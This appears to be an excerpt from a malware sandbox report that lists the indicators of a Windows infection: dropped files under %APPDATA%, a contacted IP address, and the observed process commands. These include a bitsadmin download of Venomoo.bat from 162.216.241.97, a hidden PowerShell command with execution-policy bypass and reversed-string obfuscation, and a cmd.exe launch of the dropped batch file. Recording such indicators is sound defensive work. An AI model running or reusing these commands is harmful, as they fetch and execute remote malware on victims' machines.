Technical Information
- %APPDATA%\bit3cf0.tmp
- %APPDATA%\jesus.bat.exe
- %APPDATA%\bit3cf0.tmp
- from %APPDATA%\bit3cf0.tmp to %APPDATA%\jesus.bat
- '16#.#16.241.97':80
- http://16#.#16.241.97/Venomoo.bat
- '%APPDATA%\jesus.bat.exe' -noprofile -windowstyle hidden -ep bypass -command $_CASH_kZRlb = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('%APPDATA%\jesus.bat').Split([Environment]::NewLine);foreach ($_CASH_qvLkP ...
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer 8 http://162.216.241.97/Venomoo.bat %APPDATA%\jesus.bat' (with hidden window)
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer 8 http://162.216.241.97/Venomoo.bat %APPDATA%\jesus.bat
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\jesus.bat" "